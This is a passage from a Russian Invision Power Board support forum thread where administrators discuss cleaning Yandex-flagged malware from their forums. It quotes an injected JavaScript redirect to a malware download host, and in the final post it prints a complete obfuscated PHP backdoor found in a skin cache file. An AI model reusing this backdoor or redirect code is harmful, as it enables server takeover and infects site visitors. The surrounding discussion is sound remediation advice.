Яндекс обнаружил вредоносный код на форуме - Страница 5 - Дизайн и модификация Invision Power Board

Перейти к содержимому

 

Правила раздела

Здесь обсуждаются вопросы по настройке и администрированию форумов IPB 3.x.
Пожалуйста, не оффтопьте, если зашли сюда случайно, и обратите внимание на соседние разделы.
Установка, настройка и обслуживание форумов IPB 2.x.
Оформление форумов, включая верстку скинов.
Размещение рекламы на форумах.
SEO оптимизация форума.
Техническая поддержка наших скинов и модов.

СвернутьПрикрепленные теги

вирус ipb

Яндекс обнаружил вредоносный код на форуме

#61 Пользователь не на сайте   fregs ответил: »

 
 
  • Newbie
  • *
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: Пользователи
  • Сообщений: 7
  • Регистрация: 22-Февраль 15
  • Репутация: 0
  • IPB version:3.4.x
 

Отправлено 24 Февраль 2015 - 07:08

Посмотрел в логах как повляется код в шаблоне.
Вход через админку. Причем явно бот, судя по скорости.

Жаль так и не нашел, как реализована сама уязвимость и как вытащен пароль админа.
0

#62 Пользователь на сайте   siv1987 ответил: »

 
 
  • Advanced
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: IPB Skins Team
  • Сообщений: 8 688
  • Регистрация: 20-Март 09
  • Репутация: 2 261
  • IPB version:3.1.x
 

Отправлено 24 Февраль 2015 - 12:27

Во втором сообщение написано какая уязвимость эксплуатируется. Сам вектор атаки мне тоже пока не удалось выяснить, хотя, если посмотреть на эксплоит, думая и так понятно каким приблизительно он будет.
0

#63 Пользователь не на сайте   Одмин ответил: »

 
 
  • Advanced
  • ***
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: Пользователи
  • Сообщений: 574
  • Регистрация: 21-Апрель 13
  • Репутация: 41
  • IPB version:3.4.x
 

Отправлено 28 Февраль 2015 - 00:02

siv1987, хочу проконсультироваться у Вас.
Во-первых, большое спасибо за scan.php. За все время своего форума, был всего-лишь один взлом, помните, может быть в 12-13 году до появления какого-то патча, взломали тысячи форумов и поднаклали в conf_global, потом в какой-то из аватарок под видом картинки внедрили код, и так у всех, кто был не пропатчен. Потом Вы мне сами удалили всю вирусню и пропатчили форум. Спасибо.
Сегодня решил Вашим scan-ом проанализировать состояние своего форума (добавлю, что после того, как Вы мне все настроили, меня больше не взламывали - я так думаю), и что Вы думаете? Вот, приведу несколько фрагментов, а Вы скажите, что бы это могло значить и является ли сие вирусняком... Яндекс по крайней мере на это не ругается...

1.
./dumper.php
-------------------------
base64_decode($_COOKIE['sxd']));


2.
./ips_kernel/classCaptchaPlugin/default.php
-------------------------
base64_decode( "R0lGODlhyAA8AJEAAN/f3z8/P8zMzP///yH5BAAAAAAALAAAAADIADwAAAL/nI+py+0Po5y02ouz3rz7D4biSJbmiabqyrbuC8fyTNf2jef6zvf+DwwKh8Si8YhMlgACwEHQXESfzgOzykQAqgMmFMr9Rq+GbHlqAFsFWnFVrfwIAvQAu15P0A14Nn8/ADhXd4dnl2YYCAioGHBgyDbnNzBIV0gYxzEYWdg1iLAnScmFuQdAt2UKZTcl+mip+HoYG+tKOfv3N5l5garnmPt6CwyaFzrranu7i0crObvoaKvMyMhrIQhFuyzcyGwXcOpoLYg7DGsZXk5r6DSN51RNfF0RPU5sy7gpnH5bjLhrk7Y9/RQNisfq2CRJauTR6xUuFyBx/yrWypMMmTlq/9IwQnKWcKG5cvMeShBIMOFIaV9w2eti6SBABAyjvBRFMaZCMaxsqtxl8iShjpj+VfqGCJg4XzOfJCK5DVWliFNXlSIENKjWrVy7ev0KNqzYsWTFwhlFU8waLk+efGF7hi0aSgu3iGmV1cxdoGTinimbiGOeP8SWhps6z3AkeMMWW20mMykqQyuJDbYWdufKBJWc2uWmAJZdO0yOKfTCCqHGiO4E/oKGriTYaBw5g/MDqynNlW9Uhmx66tM2i05dNcM8O6Rg2MHLYKraLTpDcLebTke4APkcduAoku0DWpe24MI96ewZPdiy6Rlx/0Y+XJevlNu/z6vtlHFxZbpv9f9edYkfxgVmjnqSxXYOYPfFVMgXIHGC0ltWDNXYJ6Lsw82AFVpWEk4pEabgbsfBM5FphyDWRh1OLCUgbC06NtNU6UV1T1Jl3YhjjjruyGOPPv4IZJBC6tDXGUDB4UUaK06RhRl/0aWWF3CR4YWESraR1ZCh6dMOiMNIFE2GI/bRJYiIEeULiloyUNSFLzWC3VXcqEJXTBe1qApDpbXUEYxr2tYeQCyyGMuIcxbokHfPvPjHf25mqeWHoLEX0iH0UScmUzSWNxmj20yH6Z+/yNTeM0N1cumkg9E4GHnluLcfeKLm95yLoO5ZKJrhgeaQm4xlFGshcK3pYZ9LradQrmY5nmhVdMm+qqpKYkIqpDyltWkpjJJaaKmd6kXjHUXvDPborOaei2666q7LbrvuvgtvvPLOS2+9YBUAADs=" );


3.
./admin/sources/base/core.php
-------------------------
eval()'d code" ) )

0

#64 Пользователь на сайте   siv1987 ответил: »

 
 
  • Advanced
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: IPB Skins Team
  • Сообщений: 8 688
  • Регистрация: 20-Март 09
  • Репутация: 2 261
  • IPB version:3.1.x
 

Отправлено 28 Февраль 2015 - 00:09

Цитата

Во-первых, большое спасибо за scan.php

Благодарить на самом деле особо не за что. Это всего лишь небольшой огрызок для быстрого поиска кода чаще всего используемого в шеллах. Есть куда более мощные сканеры по реальным сигнатурам вирусов. Когда Атаман сказал, что прождал несколько часов чтобы найти примитивный шелл вспомнил про этот скрипт. В реале же лучше использовать полноценные сканеры, как бы медленно они не работали.

Здесь вирусов нет. В первом случае это дампер (sxd), остальное рабочий код форума.
1

#65 Пользователь не на сайте   Одмин ответил: »

 
 
  • Advanced
  • ***
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: Пользователи
  • Сообщений: 574
  • Регистрация: 21-Апрель 13
  • Репутация: 41
  • IPB version:3.4.x
 

Отправлено 28 Февраль 2015 - 00:15

Проверил все 3 случая по дистрибутиву, оказалось, это обычный код, какой и должен быть... надо же, а скан на них ругается...
0

#66 Пользователь на сайте   siv1987 ответил: »

 
 
  • Advanced
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: IPB Skins Team
  • Сообщений: 8 688
  • Регистрация: 20-Март 09
  • Репутация: 2 261
  • IPB version:3.1.x
 

Отправлено 28 Февраль 2015 - 00:20

Он не ищет шеллы/бэкдоры как таковы, он ищет потенциально опасные функции, потому что шелл можно замаскировать таким образом, что его никак не отличишь от вроде нормального кода. В полноценных сканеров дополнительно есть и сигнатуры, только по ним можно сказать вирус это или нет, так как зачастую они имеют уникальный и массовый характер. "Индивидуальные" довольно сложно распознать.
0

#67 Пользователь на сайте   siv1987 ответил: »

 
 
  • Advanced
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: IPB Skins Team
  • Сообщений: 8 688
  • Регистрация: 20-Март 09
  • Репутация: 2 261
  • IPB version:3.1.x
 

Отправлено 28 Февраль 2015 - 00:25

Вас еще не взломали, но насколько я помню используете потенциально опасную версию. Следует обновится хотябы до той, для которой выпущены все последние патчи безопасности.
0

#68 Пользователь не на сайте   Одмин ответил: »

 
 
  • Advanced
  • ***
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: Пользователи
  • Сообщений: 574
  • Регистрация: 21-Апрель 13
  • Репутация: 41
  • IPB version:3.4.x
 

Отправлено 28 Февраль 2015 - 02:15

siv1987, версия-то старенькая, но я постарался всячески отгородиться от разных видов взлома. Может я напрасно столь самонадеян? Обновившись до актуальной версии, - это опять голый движок со своими тараканами + опять над ним надо работать, искать модули и приложения (которые есть сейчас) + сколько я сделал правок в файлах на сервере (100500). Если в них вносить правки для новой версии, то это опять придется искать новые решения и огромная работа над новым движком. А когда ее закончу, версия форума опять будет уязвимой. Я так понимаю, обновлениям конца и края нет, ибо всегда найдется способ взломать любой ресурс, хоть пентагона, хоть сбербанка. Не верю в утопию, что когда-то будет создан идеальный двиг без дырок и который невозможно взломать.

P.S. Да и форум мой занимает ничтожную долю информационного рынка - он никому не нужен для взлома. Это ж обычный провинциальный форум столицы одного из регионов страны.
0

#69 Пользователь не на сайте   Атаман ответил: »

 
 
  • Advanced
  • Смотреть блог
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: IPB Skins.ru Team
  • Сообщений: 2 141
  • Регистрация: 13-Апрель 12
  • Репутация: 326
  • Откуда:no
  • IPB version:1.x
 

Отправлено 03 Март 2015 - 09:06

Помогите разобраться.
Который раз яндекс блокирует сайт, первый раз я наёшл вирус, об этом писал неделю назад, а сейчас прошелся айболитом (результата не дало "Может, я что-то не увидел), могу прислать результат в ЛС).
Полностью удалял содержимое кроме uploads - и некоторых вложенных папок, менял пароли и тд. результат не дало.
0

#70 Пользователь на сайте   siv1987 ответил: »

 
 
  • Advanced
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: IPB Skins Team
  • Сообщений: 8 688
  • Регистрация: 20-Март 09
  • Репутация: 2 261
  • IPB version:3.1.x
 

Отправлено 03 Март 2015 - 12:47

То был бэкдор, он не предназначен для посетителей а для выполнения пользовательского кода на сервере.
В кеше вируса нету? Пароли все были заменены? Нужно смотреть на что ругается яндекс и искать ифреймы и вредоносные скрипты.
0

#71 Пользователь не на сайте   Атаман ответил: »

 
 
  • Advanced
  • Смотреть блог
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: IPB Skins.ru Team
  • Сообщений: 2 141
  • Регистрация: 13-Апрель 12
  • Репутация: 326
  • Откуда:no
  • IPB version:1.x
 

Отправлено 03 Март 2015 - 13:23

Все кеши очистил. Пароли менял. Фтп отключен, яндекс ругается на распространения вредоносного по
0

#72 Пользователь не на сайте   Атаман ответил: »

 
 
  • Advanced
  • Смотреть блог
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: IPB Skins.ru Team
  • Сообщений: 2 141
  • Регистрация: 13-Апрель 12
  • Репутация: 326
  • Откуда:no
  • IPB version:1.x
 

Отправлено 03 Март 2015 - 14:31

Но я этого вируса в глаза не вижу, вот в чем странность. В Бд аналогично. Возможно у кого-то через профиль ломится, сейчас залочу всем администраторам вход в АЦ и кэши очищу.

Цитата

Здравствуйте

На Вашем сайте периодически появляется указанный ниже вредоносный код:

document.location='filestore321.com/download.php?id=b8b4226f'

при подгрузке следующего url:

сайт/forum/index.php?ipbv=3f8dbe2138fd1c631467545040cce6d1&g=js

Пожалуйста, проверьте Ваши файлы и удалите вредоносный код. При поиске источника заражения воспользуйтесь рекомендациями, описанными на странице нашей Помощи http://help.yandex.r...ter/?id=1116613 .

Также об этой проблеме Вы можете прочитать в следующих статьях:

http://searchengines...ad.php?t=828634
http://ipbskins.ru/f...html#entry89857

Если при следующей проверке сайта опасное содержимое не будет обнаружено, пометка в выдаче снимется.


0

#73 Пользователь на сайте   siv1987 ответил: »

 
 
  • Advanced
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: IPB Skins Team
  • Сообщений: 8 688
  • Регистрация: 20-Март 09
  • Репутация: 2 261
  • IPB version:3.1.x
 

Отправлено 03 Март 2015 - 17:25

Менять пароли нужно при КАЖДОМ обнаружении вируса для всех пользователей и базе данных. На предыдущих страницах я приводил код который выполняют при заражении форума, где видно, что извлекаются данные всех админов с форума. После обновления кеша в АЦ желательно все же проверить файл и место где сидит вирус - может не хватает прав на запись, может вирус находится не только в кэше но и в шаблоне, тогда его нужно выпилить из шаблона в админцетре тоже. И менять пароли после каждого лечения.
1

#74 Пользователь не на сайте   Атаман ответил: »

 
 
  • Advanced
  • Смотреть блог
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: IPB Skins.ru Team
  • Сообщений: 2 141
  • Регистрация: 13-Апрель 12
  • Репутация: 326
  • Откуда:no
  • IPB version:1.x
 

Отправлено 03 Март 2015 - 17:43

Я понимаю. Первый раз хватило на неделю, но то был другой обычный вирус, тут этот приполз неожиданно.
Сейчас буду проверять шаблон админцентр. "Спс за подсказку".
0

#75 Пользователь не на сайте   ttindex ответил: »

 
 
  • Member
  • **
  • Insert nick to fast reply form
  • Quote selected text to fast reply form
  • Группа: Пользователи
  • Сообщений: 41
  • Регистрация: 14-Сентябрь 09
  • Репутация: 1
  • IPB version:3.4.x
 

Отправлено 04 Март 2015 - 11:31

в файле /cache/skin_cache/cacheid_1/skin_global.php был найден и удален следующий код:
$pk='b5c742b518ce6244a2407ff3dd9c3fcc';
$rsa='!:`>rhU`K!%T.S!k^S!rnp*Fn">7`]F/JOex<">&5pJtU&g~`dF7O"]T`Og~kQ#*`b*s!QMs5[S*`Og+Up;aO"]Qk&FQkQkKC[*Inp*^n"}:JtF>kxn:kxCxP6|s<qtsJfmskqg>S[#*OtW-{tMUnAWNOb*sJOJmU[mf4Og>gZM0Jp]ZU"M>5Ag~k>FQUqe}CQ#*OtW-{tMUnAWNOb*s5HK*SHt|kAn>JtFz4OMZ`[#xB"n:SA}/kp>*JOni4qnmS"}ik"}tkxWi!d;7Jp]TB"*xP[M0{~]b]*]bdQSB];MeOt]HM]n0e{S;H>exOb*Inp4FeAWmkxg>Oq]QU[#*Otg;{>J;{>Kxb;M{{;FbM{J;{*]bnt~s<QMZ-{|*J>Kx`pF/S[SS<QMQ-{W+k&]xO"tmSpg^5[kZUp>"J]+74"Fz0pS:U"SKJ]+70A>m`pF:O[ai4&>7JQaZU"ti!d;7Jp]TO[aQSO}Q4dtfUp]QO[aQSO}f4d>*S]+70pJm4"]fU"FNO[ai`da/Sp;xk&;zO[aiSp>7!O]QU;+70pnsS;+7UA*Z`bkKnpCs0A+*4/~Fnqe74"ix<QM^-bM0{~]b]*]bdQSB];MeO~m-{texOHK*4Z~*SpmskQ~GkmNrTq1Gk"]~Sp>7JqgUn"g:U"zsJ]FsJ[SS<QMx-bMfPfS/JOg/`dF7O">*n/K*JH~*4fTxUp;7JtFsJ[kInpeFJdt+SA*^n;FHM]ndM]nUn~m{];W0d;FgHt^xOb*I`d4^Jdt+SA*^n;F6H~FPb{]Unp]S5b>I`d4^`Og/JOe^n;FAM]MUn">+4x4xOb*&nf#mJdt+SA*^n;FAM]MUn"kxOb*snf4^Bd]zkAMa5[M0e~F-b~>;dQMxOb*s5OzsJf#*4/~Fnp#s!">&5[M*5Og>Spg:U"zsJb#*Jb+xJdTxPAMsUd{^5bK/gZ|+C[*Inp~Fkq]fkqMQ5pt*gb#*`[*KC[+T5Hz+k&>7S[#fJpFZSdt>Uxe7UpFZ4OMsU"TFn"m~SA|%PQFtk&+~k"m:kxe7`da&UQFInptFnQBs<qt>!p>~<qtsJf#^BbMt5b4&nABs!QMn{jnB]jtCPZ~f-AgZk&>+S[W~!OW>-bS~JOm~P"smS&;/4qnskAexBAgQ4/~x!QM~`p>/PHa/JOM~`daxktKx4&Fmk&M0SOnKnttFP">7Jp]TPxW^k6Fskpn"-OK*SpmskQ~GkmNrTq1Gk&]x`Og~kx*z-&FtSAWtS[~GkmNrTq1G4da~`{gm4"m>bp;/`A~&4dt+<"kF`xCx-Z+:k"gQ`OW~-fBI0O~11l';
$pka='!+Fa[3S%s}<QL*DKI-xA?tuV$]2rzJ~^B.glo)b{1W:REej@dN6vn|XicM"=m`hGpU_Cf8kY5;/#q,OPT47wyZ9H>0(&';
$pkb='ew95C#d6pxOy&k<s7PnH:1$`"Vq(tZ0oI_N;?}SU)Bv=]QE+WrD/JA,8!R2~ha@.Gb[Mi-c^KFzg3|XL4Yu{>j*Tlf%m';
$f='%t%'.substr($rsa,718,1);
$klf=preg_replace($f,strtr($rsa,$pka,$pkb),'html');


Код удалил.

Прочитал внимательно посты от siv1987 по лечению сайта, где основная суть лечения заключается в:
1. Проверка шаблона includeJS (Глобальные) в АЦ. Обновления кеша стилей для удаления вредасного кода из кеша.
Кода в файле вредоносного не было найдено:

2. Обновления форума до актуальной версии со всеми патчами безопасности (или хотябы установка ихних)
Патчи все установил последние

3. Смена паролей для:- всех (!) пользователей имеющих доступ в АЦ: - базе данных, - фтп
Сменил

4. Добавления форума в Яндекс.Вебмастер'е с отправкой запроса на перепроверку в разделе Безопасность (это ускорит повторную проверку форума).
Ответ от Яндекса - Ваш сайт заражен


Захожу в файл /cache/skin_cache/cacheid_1/skin_global.php и снова нахожу вирусный код, который удалил вчера:
Что делать дальше? Где искать?
0

Сообщить об этой теме:




Быстрый ответ

  

1 пользователей читают эту тему
0 зарегистрированных, 1 гостей, 0 скрытых


Контактная информация

Вопросы по работе сайта

+7 (917) 501-4765
C 10 до 20 в рабочие дни (время московское)

Техническая поддержка

Контактные данные специалистов

Дизайн форумов

IPB 3.x ¦ IPB 2.x

Бесплатные шаблоны

IPB 3.2 – 3.4 ¦ IPB 3.1 ¦ IPB 3.0 ¦ IPB 2.2 – 2.3 ¦ IPB 2.1 ¦ Клипарт
Лицензия на использование ¦ Ваша поддержка ¦ О проекте
Copyright © 2005-2016 IPBSkins.ru Team
При копировании материалов с сайта
прямая ссылка на источник обязательна